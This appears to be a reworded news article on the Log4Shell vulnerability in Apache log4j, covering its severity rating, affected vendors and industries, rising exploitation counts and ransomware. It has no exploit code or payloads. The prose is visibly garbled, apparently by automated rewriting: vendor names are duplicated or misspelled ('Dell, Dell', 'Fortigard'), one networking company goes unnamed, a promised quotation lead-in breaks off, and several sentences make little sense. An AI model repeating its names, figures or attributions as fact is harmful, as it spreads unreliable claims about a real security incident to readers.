Log4j: Just How Screwed Are We?



It has been a year for cyber debacles, so why not tie it all together with a nice, fat security vulnerability that affects almost everything on the internet? That sounds correct.

The Apache log4j bug is bad. It is one of the most serious that Jen Easterly has seen in her entire career. In a recent media appearance, Easterly told reporters that federal officials expect the vulnerability to be widely exploited by sophisticated actors, and her colleague, Jay Gazlay, of the vulnerability management office, helpfully revealed that the bug likely affects hundreds of millions of devices.

It might be helpful to know what is going on with this situation. There is a quick rundown on the horribleness.

There is a bad bug on the web.

Apache's log4j is a free and open-source logging library that drives companies to use it. Engineers use logging libraries to record how programs run, they allow for code auditing and are a routine mechanism to investigate bugs. Since log4j is free and widely trusted, companies large and small have been using it. The irony is that the tool now has a bug.

The vulnerability is called Log4Shell because proper exploitation can result in shell access to a server's system. It has a severity rating of 10 on the Common Vulnerability Scoring System scale, which is the worst you can get. It was disclosed less than a week ago after a member of the Cloud Security team spotted it.

The bug is a zero-day remote code execution vulnerability, which means that attackers can download and run script on targeted server, leaving them open to complete remote control. Criminals don't have to do much to cause a lot of trouble.

Who is affected?

Most of the biggest platforms on the internet are tied up with log4j. At this point, a comprehensive accounting seems like a quixotic ambition, as there are multiple lists that purport to show just who is affected and who might be affected. According to various reports, the afflicted include big names like Apple, Amazon, and more.

Companies that have confirmed their involvement often report that their products and services need patching. Cloud computing firm VMWare reports that 44 of its products are affected. Thirty-five of the tools of the networking giant are vulnerable. At least a dozen of Fortigard's products are affected. The list continues.

One of the biggest companies is Amazon. The tech giant has been regularly publishing updates related to its products and services, while Apple recently patched itself up after being affected by a bug. Tech giants like Dell, Dell, and Citrix, as well as prominent tech firms like SonicWall, Trend Micro, and Oracle, are still investigating whether they have been screwed.

Outside of tech, the bug has the potential to mess with industries you wouldn't normally associate with these kinds of problems. Dragos, which analyzes security as it relates to operational and industrial systems, recently wrote.

Electric power, water, food and beverage, manufacturing, transportation, and more are some of the industries that will be exposed to remote exploitation because of this cross-cutting vulnerability.

Incoming attacks.

That is the bad news. The good news? There is no good news. There is more bad news, because mass exploitation attempts are already happening. Security researchers throughout the internet have begun to publish reports on the activity they are seeing.

The log4j vuln appears to have been found by most criminals at the same time as everyone else. Since last week, exploitation attempts on vulnerable systems and platforms have increased greatly, as hackers throughout the web seek to take advantage of this uniquely horrible situation. Check Point recently published data showing that it had observed an explosion of exploit attempts since the initial disclosures about the bug. The report has notes.

Reports on December 10th showed only a few thousand attack attempts, but by Saturday, December 11th they had risen to over 40,000. Almost 200,000 attempts of attack were recorded by our sensors after the initial outbreak. 72 hours after the initial outbreak, the number hit over one million attacks.

The Vice President of Threat Intelligence at the firm told Gizmodo that this kind of activity was par for the course. The log4j vulnerability is likely to be exploited by the ransomware eventually. He said in an email that the vulnerable systems are likely critical assets.

According to research published by Bitdefender, a new family of ransomware known as "Khonsari" attempts to exploit vulnerable machines. According to the research, Khonsari has been targeting Microsoft systems.

Other cybersecurity professionals have written about a variety of attempted exploits, including the likes of which run the gamut from the likes of a botnet to more general scans.

These attacks seem to be coming fast and furious. We are seeing over 1,000 attempted exploits per second. The payloads are getting more frightening. Matthew Prince, the CEO of Cloudflare, said that the Ransomware payloads started in force in the last 24 hours.

This week, a second vulnerability was discovered. Apache has already released an update to mitigate risks after researchers at Luna Sec said that previously patched systems could still run afoul of the latest bug.

If you are a casual web user, the only thing you can do is to update your devices and applications when prompted and hope that the platforms you are relying on are swift enough to identify the vulnerabilities, conjure up patches, and push out updates. Hang in there, everyone.